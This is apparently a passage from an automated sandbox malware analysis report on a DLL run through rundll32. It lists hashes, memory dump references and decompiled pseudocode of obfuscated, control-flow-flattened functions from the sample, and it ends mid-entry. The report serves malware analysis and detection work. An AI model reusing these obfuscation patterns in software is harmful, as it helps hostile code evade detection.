                                                                                                                                                            • Instruction Fuzzy Hash: E921CFB6C00208EBCF49DFE5CA8689EBFB5FF40308F608189A411BA261D3B54B549B95
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100323E2 Relevance: .4, Instructions: 384COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                            • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                                                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                            • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10031FC2 Relevance: .4, Instructions: 378COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                            • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                                                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                            • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10031BB6 Relevance: .4, Instructions: 361COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                            • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                                                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                            • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100317E2 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                            • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                                                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                            • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00374346 Relevance: .2, Instructions: 173COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E00374346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t146;
				void* _t165;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				void* _t177;
				intOrPtr* _t196;
				void* _t197;
				signed int* _t200;

				_push(_a8);
				_t196 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t146);
				_v8 = 0x1587dd;
				_t200 =  &(( &_v72)[4]);
				_t197 = 0;
				_v4 = _v4 & 0;
				_t177 = 0x762b00a;
				_v40 = 0x54d1b5;
				_t170 = 0x79;
				_v40 = _v40 / _t170;
				_v40 = _v40 ^ 0x0000b372;
				_v16 = 0xa1afdd;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000050c;
				_v68 = 0x910a11;
				_t171 = 0x13;
				_v68 = _v68 / _t171;
				_v68 = _v68 << 2;
				_v68 = _v68 + 0x13e3;
				_v68 = _v68 ^ 0x00184f98;
				_v32 = 0xaf4665;
				_t172 = 0x26;
				_v32 = _v32 * 0x1c;
				_v32 = _v32 ^ 0x13220c8d;
				_v56 = 0xf39368;
				_v56 = _v56 + 0xf012;
				_v56 = _v56 / _t172;
				_v56 = _v56 ^ 0x000d8e66;
				_v36 = 0xa121b7;
				_v36 = _v36 + 0x3186;
				_v36 = _v36 ^ 0x00aec580;
				_v72 = 0x8bd634;
				_t173 = 0x16;
				_v72 = _v72 / _t173;
				_v72 = _v72 | 0xc3992ef3;
				_v72 = _v72 + 0xf49;
				_v72 = _v72 ^ 0xc3912c07;
				_v24 = 0xbc86c6;
				_v24 = _v24 | 0x4f3bdf6c;
				_v24 = _v24 ^ 0x4fbb36fd;
				_v64 = 0xf11315;
				_v64 = _v64 | 0x791eed70;
				_v64 = _v64 + 0xffff781b;
				_v64 = _v64 | 0xb4748ed7;
				_v64 = _v64 ^ 0xfdf43fb6;
				_v28 = 0xa9ea5e;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x53d38433;
				_v44 = 0xab8ea7;
				_t174 = 0x5e;
				_v44 = _v44 / _t174;
				_v44 = _v44 >> 5;
				_v44 = _v44 ^ 0x00061aeb;
				_v48 = 0xf3254f;
				_v48 = _v48 + 0xffff7d1c;
				_v48 = _v48 ^ 0x338af708;
				_v48 = _v48 ^ 0x337c7814;
				_v60 = 0xe02c97;
				_v60 = _v60 * 0x4f;
				_v60 = _v60 + 0xffffa06e;
				_v60 = _v60 + 0x8165;
				_v60 = _v60 ^ 0x4522059f;
				_v52 = 0x13fe8b;
				_v52 = _v52 >> 6;
				_v52 = _v52 + 0xffffbd6d;
				_v52 = _v52 ^ 0x000eeb0b;
				_v20 = 0x7ee5fd;
				_v20 = _v20 | 0xb1050693;
				_v20 = _v20 ^ 0xb17ba1e4;
				do {
					while(_t177 != 0x29b5a10) {
						if(_t177 == 0x761c4cc) {
							_push(_t177);
							_t165 = E0037AE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
							_t200 =  &(_t200[0xa]);
							if(_t165 != 0) {
								_t177 = 0x29b5a10;
								continue;
							}
						} else {
							if(_t177 == 0x762b00a) {
								_t177 = 0x761c4cc;
								continue;
							} else {
								if(_t177 != 0x7f1be9f) {
									goto L13;
								} else {
									_push(_t177);
									E0037AE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
									 *_t196 = _v12;
								}
							}
						}
						L6:
						return _t197;
					}
					_push(_t177);
					_push(_t177);
					_t197 = E00377FF2(_v12);
					if(_t197 == 0) {
						_t177 = 0xc410c1b;
						goto L13;
					} else {
						_t177 = 0x7f1be9f;
						continue;
					}
					goto L6;
					L13:
				} while (_t177 != 0xc410c1b);
				goto L6;
			}
































                                                                                                                                                            0x0037434d
                                                                                                                                                            0x00374351
                                                                                                                                                            0x00374353
                                                                                                                                                            0x00374357
                                                                                                                                                            0x00374358
                                                                                                                                                            0x00374359
                                                                                                                                                            0x0037435e
                                                                                                                                                            0x00374366
                                                                                                                                                            0x0037436b
                                                                                                                                                            0x0037436d
                                                                                                                                                            0x00374371
                                                                                                                                                            0x00374376
                                                                                                                                                            0x00374384
                                                                                                                                                            0x00374389
                                                                                                                                                            0x0037438f
                                                                                                                                                            0x00374397
                                                                                                                                                            0x0037439f
                                                                                                                                                            0x003743a4
                                                                                                                                                            0x003743ac
                                                                                                                                                            0x003743b8
                                                                                                                                                            0x003743bd
                                                                                                                                                            0x003743c3
                                                                                                                                                            0x003743c8
                                                                                                                                                            0x003743d0
                                                                                                                                                            0x003743d8
                                                                                                                                                            0x003743e5
                                                                                                                                                            0x003743e8
                                                                                                                                                            0x003743ec
                                                                                                                                                            0x003743f4
                                                                                                                                                            0x003743fc
                                                                                                                                                            0x0037440c
                                                                                                                                                            0x00374410
                                                                                                                                                            0x00374418
                                                                                                                                                            0x00374420
                                                                                                                                                            0x00374428
                                                                                                                                                            0x00374430
                                                                                                                                                            0x0037443c
                                                                                                                                                            0x00374441
                                                                                                                                                            0x00374447
                                                                                                                                                            0x0037444f
                                                                                                                                                            0x00374457
                                                                                                                                                            0x0037445f
                                                                                                                                                            0x00374467
                                                                                                                                                            0x0037446f
                                                                                                                                                            0x00374477
                                                                                                                                                            0x0037447f
                                                                                                                                                            0x00374487
                                                                                                                                                            0x0037448f
                                                                                                                                                            0x00374497
                                                                                                                                                            0x0037449f
                                                                                                                                                            0x003744a7
                                                                                                                                                            0x003744ac
                                                                                                                                                            0x003744b4
                                                                                                                                                            0x003744c0
                                                                                                                                                            0x003744c3
                                                                                                                                                            0x003744c7
                                                                                                                                                            0x003744cc
                                                                                                                                                            0x003744d9
                                                                                                                                                            0x003744e6
                                                                                                                                                            0x003744ee
                                                                                                                                                            0x003744f6
                                                                                                                                                            0x003744fe
                                                                                                                                                            0x0037450b
                                                                                                                                                            0x0037450f
                                                                                                                                                            0x00374517
                                                                                                                                                            0x0037451f
                                                                                                                                                            0x00374527
                                                                                                                                                            0x0037452f
                                                                                                                                                            0x00374534
                                                                                                                                                            0x0037453c
                                                                                                                                                            0x00374544
                                                                                                                                                            0x0037454c
                                                                                                                                                            0x00374554
                                                                                                                                                            0x0037455c
                                                                                                                                                            0x0037455c
                                                                                                                                                            0x00374566
                                                                                                                                                            0x003745bd
                                                                                                                                                            0x003745e3
                                                                                                                                                            0x003745e8
                                                                                                                                                            0x003745ed
                                                                                                                                                            0x003745ef
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003745ef
                                                                                                                                                            0x00374568
                                                                                                                                                            0x0037456e
                                                                                                                                                            0x003745b9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374570
                                                                                                                                                            0x00374576
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037457c
                                                                                                                                                            0x0037457c
                                                                                                                                                            0x003745a1
                                                                                                                                                            0x003745ad
                                                                                                                                                            0x003745ad
                                                                                                                                                            0x00374576
                                                                                                                                                            0x0037456e
                                                                                                                                                            0x003745b0
                                                                                                                                                            0x003745b8
                                                                                                                                                            0x003745b8
                                                                                                                                                            0x00374606
                                                                                                                                                            0x00374607
                                                                                                                                                            0x0037460d
                                                                                                                                                            0x00374613
                                                                                                                                                            0x0037461f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374615
                                                                                                                                                            0x00374615
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374615
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374624
                                                                                                                                                            0x00374624
                                                                                                                                                            0x00000000

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                                            • Instruction ID: f6baba33a109f4d5d9ec3bce5cf8d30ec935dcc6f11581216c2f3cc98186a3f3
                                                                                                                                                            • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                                            • Instruction Fuzzy Hash: D17133B2109341AFD369CF21C98982BBBF1EBD9718F10891DF29556260D3B6D949CF83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038894B Relevance: .1, Instructions: 128COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E0038894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t97;
				void* _t111;
				void* _t115;
				void* _t117;
				void* _t135;
				void* _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t142;
				void* _t143;

				_push(_a16);
				_t115 = __edx;
				_t135 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t97);
				_v64 = 0x51cd23;
				_t143 = _t142 + 0x18;
				_t136 = 0;
				_t117 = 0x1f0121b;
				_t137 = 0x4d;
				_v64 = _v64 / _t137;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x00032222;
				_v68 = 0xd4b8b7;
				_v68 = _v68 + 0xffffd2af;
				_v68 = _v68 ^ 0xd36e67b3;
				_v68 = _v68 ^ 0xd3b4aa1e;
				_v76 = 0x6efd74;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0x2f6bad1f;
				_t138 = 0x34;
				_v76 = _v76 / _t138;
				_v76 = _v76 ^ 0x00af6c6b;
				_v52 = 0x9958c4;
				_v52 = _v52 + 0xffff4241;
				_v52 = _v52 ^ 0x009a50fc;
				_v56 = 0x2e84bf;
				_t139 = 0x72;
				_v56 = _v56 * 0x77;
				_v56 = _v56 ^ 0x15969b56;
				_v80 = 0x2bfbd3;
				_v80 = _v80 | 0xbb654ab5;
				_v80 = _v80 * 0x48;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00b72d27;
				_v60 = 0xb8f349;
				_v60 = _v60 / _t139;
				_v60 = _v60 ^ 0xcb885b35;
				_v60 = _v60 ^ 0xcb801a24;
				_v72 = 0xbf562d;
				_t140 = 0x42;
				_v72 = _v72 / _t140;
				_v72 = _v72 ^ 0xd5944d41;
				_v72 = _v72 ^ 0x4a8545c0;
				_v72 = _v72 ^ 0x9f1c34cb;
				_v48 = 0xda7c79;
				_v48 = _v48 << 0xc;
				_v48 = _v48 ^ 0xa7c49699;
				do {
					while(_t117 != 0x1f0121b) {
						if(_t117 == 0x20f75ec) {
							E00373DBC( &_v44, _t115, _v64, _v68, _v76);
							_t143 = _t143 + 0xc;
							_t117 = 0x98c428b;
							continue;
						} else {
							if(_t117 == 0x98c428b) {
								_t111 = E00372A21(_v52, _v56,  &_v44, _t135, _v80);
								_t143 = _t143 + 0xc;
								__eflags = _t111;
								if(__eflags != 0) {
									_t117 = 0xea94eac;
									continue;
								}
							} else {
								_t149 = _t117 - 0xea94eac;
								if(_t117 != 0xea94eac) {
									goto L11;
								} else {
									E0038D97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
									_t136 =  !=  ? 1 : _t136;
								}
							}
						}
						L6:
						return _t136;
					}
					_t117 = 0x20f75ec;
					L11:
					__eflags = _t117 - 0x3544eb3;
				} while (__eflags != 0);
				goto L6;
			}

























                                                                                                                                                            0x00388952
                                                                                                                                                            0x00388956
                                                                                                                                                            0x00388958
                                                                                                                                                            0x0038895a
                                                                                                                                                            0x0038895e
                                                                                                                                                            0x00388962
                                                                                                                                                            0x00388966
                                                                                                                                                            0x00388967
                                                                                                                                                            0x00388968
                                                                                                                                                            0x0038896d
                                                                                                                                                            0x00388975
                                                                                                                                                            0x0038897e
                                                                                                                                                            0x00388980
                                                                                                                                                            0x00388987
                                                                                                                                                            0x0038898c
                                                                                                                                                            0x00388992
                                                                                                                                                            0x00388997
                                                                                                                                                            0x0038899f
                                                                                                                                                            0x003889a7
                                                                                                                                                            0x003889af
                                                                                                                                                            0x003889b7
                                                                                                                                                            0x003889bf
                                                                                                                                                            0x003889c7
                                                                                                                                                            0x003889cc
                                                                                                                                                            0x003889d8
                                                                                                                                                            0x003889dd
                                                                                                                                                            0x003889e3
                                                                                                                                                            0x003889eb
                                                                                                                                                            0x003889f3
                                                                                                                                                            0x003889fb
                                                                                                                                                            0x00388a03
                                                                                                                                                            0x00388a10
                                                                                                                                                            0x00388a13
                                                                                                                                                            0x00388a17
                                                                                                                                                            0x00388a1f
                                                                                                                                                            0x00388a27
                                                                                                                                                            0x00388a34
                                                                                                                                                            0x00388a38
                                                                                                                                                            0x00388a3d
                                                                                                                                                            0x00388a45
                                                                                                                                                            0x00388a55
                                                                                                                                                            0x00388a59
                                                                                                                                                            0x00388a61
                                                                                                                                                            0x00388a69
                                                                                                                                                            0x00388a75
                                                                                                                                                            0x00388a7d
                                                                                                                                                            0x00388a81
                                                                                                                                                            0x00388a89
                                                                                                                                                            0x00388a91
                                                                                                                                                            0x00388a99
                                                                                                                                                            0x00388aa1
                                                                                                                                                            0x00388aa6
                                                                                                                                                            0x00388aae
                                                                                                                                                            0x00388aae
                                                                                                                                                            0x00388abc
                                                                                                                                                            0x00388b33
                                                                                                                                                            0x00388b38
                                                                                                                                                            0x00388b3b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388abe
                                                                                                                                                            0x00388ac4
                                                                                                                                                            0x00388b0e
                                                                                                                                                            0x00388b13
                                                                                                                                                            0x00388b16
                                                                                                                                                            0x00388b18
                                                                                                                                                            0x00388b1a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388b1a
                                                                                                                                                            0x00388ac6
                                                                                                                                                            0x00388ac6
                                                                                                                                                            0x00388acc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388ace
                                                                                                                                                            0x00388ae2
                                                                                                                                                            0x00388aef
                                                                                                                                                            0x00388aef
                                                                                                                                                            0x00388acc
                                                                                                                                                            0x00388ac4
                                                                                                                                                            0x00388af3
                                                                                                                                                            0x00388afb
                                                                                                                                                            0x00388afb
                                                                                                                                                            0x00388b45
                                                                                                                                                            0x00388b47
                                                                                                                                                            0x00388b47
                                                                                                                                                            0x00388b47
                                                                                                                                                            0x00000000

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                                            • Instruction ID: 4fafd6bb604d9f0b9365fe4058ce9cf6d64d7dc0438a0baa3c095e55bcab7958
                                                                                                                                                            • Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                                            • Instruction Fuzzy Hash: D0518771108301AFC759DF22C98681BBBE5FBD8708F50892DF59596260D772CA19CF86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038AC3A Relevance: .1, Instructions: 89COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                            			E0038AC3A(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t82;
				signed int _t85;
				signed int _t86;
				void* _t88;
				void* _t96;
				void* _t97;
				signed int* _t99;

				_t88 = __ecx;
				_t99 =  &_v28;
				_v24 = 0x5aa995;
				_v24 = _v24 | 0x25663b9c;
				_v24 = _v24 << 6;
				_t85 = 0x11;
				_v24 = _v24 / _t85;
				_t96 = 0;
				_v24 = _v24 ^ 0x05a97123;
				_t97 = 0xfe6f9f;
				_v16 = 0x9f09af;
				_v16 = _v16 + 0xcb37;
				_v16 = _v16 ^ 0x3a843722;
				_v16 = _v16 ^ 0x3a14bc19;
				_v28 = 0x7e93e4;
				_v28 = _v28 << 0xa;
				_t86 = 0x1a;
				_v28 = _v28 / _t86;
				_v28 = _v28 ^ 0x4056cd73;
				_v28 = _v28 ^ 0x49f3cf3d;
				_v4 = 0x47c602;
				_v4 = _v4 ^ 0xe3aa640e;
				_v4 = _v4 | 0xd85731ad;
				_v4 = _v4 ^ 0xfbf46e2b;
				_v8 = 0x201e29;
				_v8 = _v8 << 0x10;
				_v8 = _v8 * 0x48;
				_v8 = _v8 ^ 0x7b8200e2;
				_v12 = 0x18f9c1;
				_v12 = _v12 * 0x54;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x0c72dcb8;
				_v20 = 0xd6b502;
				_v20 = _v20 * 0x55;
				_v20 = _v20 << 0xd;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x00034ef9;
				do {
					while(_t97 != 0xfe6f9f) {
						if(_t97 == 0x2f82a60) {
							_push(_t88);
							_push(_t88);
							_t82 = E0037474B();
							_t99 =  &(_t99[2]);
							_t97 = 0x6e030e4;
							_t96 = _t96 + _t82;
							continue;
						} else {
							if(_t97 != 0x6e030e4) {
								goto L8;
							} else {
								_t96 = _t96 + E0038C2F8(_v4, _t88 + 4, _v8, _v12, _v20);
							}
						}
						L5:
						return _t96;
					}
					_t97 = 0x2f82a60;
					L8:
				} while (_t97 != 0xea6061f);
				goto L5;
			}

















                                                                                                                                                            0x0038ac3a
                                                                                                                                                            0x0038ac3a
                                                                                                                                                            0x0038ac3d
                                                                                                                                                            0x0038ac47
                                                                                                                                                            0x0038ac4f
                                                                                                                                                            0x0038ac5e
                                                                                                                                                            0x0038ac68
                                                                                                                                                            0x0038ac6c
                                                                                                                                                            0x0038ac6e
                                                                                                                                                            0x0038ac76
                                                                                                                                                            0x0038ac78
                                                                                                                                                            0x0038ac80
                                                                                                                                                            0x0038ac88
                                                                                                                                                            0x0038ac90
                                                                                                                                                            0x0038ac98
                                                                                                                                                            0x0038aca0
                                                                                                                                                            0x0038acab
                                                                                                                                                            0x0038acb8
                                                                                                                                                            0x0038acbc
                                                                                                                                                            0x0038acc4
                                                                                                                                                            0x0038accc
                                                                                                                                                            0x0038acd4
                                                                                                                                                            0x0038acdc
                                                                                                                                                            0x0038ace4
                                                                                                                                                            0x0038acec
                                                                                                                                                            0x0038acf4
                                                                                                                                                            0x0038acfe
                                                                                                                                                            0x0038ad02
                                                                                                                                                            0x0038ad0a
                                                                                                                                                            0x0038ad17
                                                                                                                                                            0x0038ad1b
                                                                                                                                                            0x0038ad20
                                                                                                                                                            0x0038ad28
                                                                                                                                                            0x0038ad35
                                                                                                                                                            0x0038ad39
                                                                                                                                                            0x0038ad3e
                                                                                                                                                            0x0038ad43
                                                                                                                                                            0x0038ad4b
                                                                                                                                                            0x0038ad4b
                                                                                                                                                            0x0038ad51
                                                                                                                                                            0x0038ad8a
                                                                                                                                                            0x0038ad8b
                                                                                                                                                            0x0038ad8c
                                                                                                                                                            0x0038ad91
                                                                                                                                                            0x0038ad94
                                                                                                                                                            0x0038ad96
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ad53
                                                                                                                                                            0x0038ad55
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ad57
                                                                                                                                                            0x0038ad72
                                                                                                                                                            0x0038ad72
                                                                                                                                                            0x0038ad55
                                                                                                                                                            0x0038ad74
                                                                                                                                                            0x0038ad7d
                                                                                                                                                            0x0038ad7d
                                                                                                                                                            0x0038ad9a
                                                                                                                                                            0x0038ad9c
                                                                                                                                                            0x0038ad9c
                                                                                                                                                            0x00000000

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
